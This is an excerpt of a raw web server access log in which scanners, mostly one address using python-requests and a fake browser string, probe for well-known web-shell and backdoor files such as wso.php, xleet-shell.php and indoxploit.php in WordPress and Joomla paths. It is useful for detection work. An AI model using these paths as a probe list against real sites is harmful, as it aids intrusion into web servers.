/libraries/joomla/jmails.php?u HTTP/1.1" 301 264 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:37:54 -0400] "GET /libraries/joomla/jmail.php?u HTTP/1.1" 301 263 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:38:09 -0400] "GET /images/vuln.php HTTP/1.1" 301 250 "-" "python-requests/2.27.1" 173.252.79.116 - - [12/Aug/2025:21:38:18 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:21:38:41 -0400] "GET /tmp/vuln.php HTTP/1.1" 301 247 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:39:06 -0400] "GET /XxX.php HTTP/1.1" 301 242 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:39:09 -0400] "GET /libraries/legacy/updates.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.11.185 - - [12/Aug/2025:21:39:11 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:21:39:11 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:21:39:11 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:21:39:12 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:39:26 -0400] "GET /Marvins.php HTTP/1.1" 301 246 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:39:51 -0400] "GET /.well-known/class.api.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:39:54 -0400] "GET /rxr.php?rxr HTTP/1.1" 301 246 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:40:16 -0400] "GET /olux.php HTTP/1.1" 301 243 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:40:46 -0400] "GET /indoxploit.php HTTP/1.1" 301 249 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:41:17 -0400] "GET /error.php HTTP/1.1" 301 244 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:41:39 -0400] "GET /web/libraries/legacy/updates.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:41:42 -0400] "GET /RxR.php HTTP/1.1" 301 242 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:41:57 -0400] "GET /components/com_b2jcontact/izoc.php HTTP/1.1" 301 269 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:42:16 -0400] "GET /V3.php HTTP/1.1" 301 241 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:42:33 -0400] "GET /V5.php HTTP/1.1" 301 241 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:42:50 -0400] "GET /olux.php HTTP/1.1" 301 243 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:43:11 -0400] "GET /indoxploit.php HTTP/1.1" 301 249 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:43:29 -0400] "GET /indoxploit.php HTTP/1.1" 301 249 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:43:41 -0400] "GET /plugins/updates.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:43:48 -0400] "GET /wso.php HTTP/1.1" 301 242 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:43:58 -0400] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 274 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:44:06 -0400] "GET /images/ HTTP/1.1" 301 242 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:44:31 -0400] "GET /uploads/ HTTP/1.1" 301 243 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:44:52 -0400] "GET /img/ HTTP/1.1" 301 239 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:45:07 -0400] "GET /upload/ HTTP/1.1" 301 242 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:45:23 -0400] "GET /gallery/ HTTP/1.1" 301 243 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:45:27 -0400] "GET /includes/updates.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:21:45:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:21:45:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:21:45:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:21:45:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:45:51 -0400] "GET /files/ HTTP/1.1" 301 241 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:46:07 -0400] "GET /pdf/ HTTP/1.1" 301 239 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:46:26 -0400] "GET /docs/ HTTP/1.1" 301 240 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:46:38 -0400] "GET / HTTP/1.1" 301 235 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:46:47 -0400] "GET /.well-known/pki-validation/class.api.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:46:54 -0400] "GET /up.php HTTP/1.1" 301 241 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:47:12 -0400] "GET /upload.php HTTP/1.1" 301 245 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:47:23 -0400] "GET /logs/updates.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:47:29 -0400] "GET /shell.php HTTP/1.1" 301 244 "-" "python-requests/2.27.1" 209.38.125.40 - - [12/Aug/2025:21:48:19 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:21:48:19 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:21:48:23 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:21:48:46 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:49:20 -0400] "GET /sts.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:49:25 -0400] "GET /templates/protostar/updates.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:49:27 -0400] "GET /wp-hoard.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:49:39 -0400] "GET /wp-content/class.api.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:49:40 -0400] "GET /wp-l0gin.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:49:49 -0400] "GET /priv8.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:49:56 -0400] "GET /wp-post-editor.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:49:59 -0400] "GET /404.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:50:06 -0400] "GET /users.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:50:10 -0400] "GET /classwithtostring.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:50:11 -0400] "GET /avaa.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:50:21 -0400] "GET /wp-content/plugins/ccx/index.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:50:29 -0400] "GET /wp-head.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:50:30 -0400] "GET /ccx/index.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:50:36 -0400] "GET /admin.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:50:37 -0400] "GET /wp-content/plugins/ccx/index.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:50:44 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:08 -0400] "GET /ccx/index.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:10 -0400] "GET /xt/index.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:12 -0400] "GET /libraries/phpmailer/updates.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:13 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:22 -0400] "GET /xleet-shell.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:25 -0400] "GET /wp-header.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:29 -0400] "GET /xt/index.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:35 -0400] "GET /radio.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:40 -0400] "GET /xleet.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:44 -0400] "GET /simple.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:55 -0400] "GET /cong.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:58 -0400] "GET /options.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:51:59 -0400] "GET /xleet-shell.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:52:07 -0400] "GET /wp-content/index.php?x=ooo HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:52:07 -0400] "GET /xleetshell.php HTTP/1.1" 301 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:52:10 -0400] "GET /wp-admin/options.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:52:18 -0400] "GET /xleet.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:52:20 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:52:25 -0400] "GET /wp-admin/includes/xleet-shell.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:52:34 -0400] "GET /sts.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:52:42 -0400] "GET /xleetshell.php HTTP/1.1" 301 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:52:48 -0400] "GET /wp-hoard.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:52:54 -0400] "GET /1index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:53:01 -0400] "GET /wp-content/plugins/content-management/content.php HTTP/1.1" 301 284 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:53:06 -0400] "GET /libraries/vendor/updates.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:53:08 -0400] "GET /11index.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:21:53:17 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:21:53:17 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:21:53:17 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:53:17 -0400] "GET /2index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 159.89.216.7 - - [12/Aug/2025:21:53:17 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:53:21 -0400] "GET /xlt.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:53:23 -0400] "GET /3index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:53:26 -0400] "GET /.tmb/class.api.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:53:32 -0400] "GET /wp-admin/includes/xleet-shell.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:53:34 -0400] "GET /wp_wrong_datlib.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:53:47 -0400] "GET /wp-adminincludesclass-wp-media-list-data.php HTTP/1.1" 301 279 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:53:52 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:53:55 -0400] "GET /wp-content/themes/gaukingo/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:53:57 -0400] "GET /wso.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:53:58 -0400] "GET /wp-content/plugins/xt/index.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:54:02 -0400] "GET /doc.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:54:08 -0400] "GET /wp-content/plugins/content-management/content.php HTTP/1.1" 301 284 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:54:24 -0400] "GET /stindex.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) 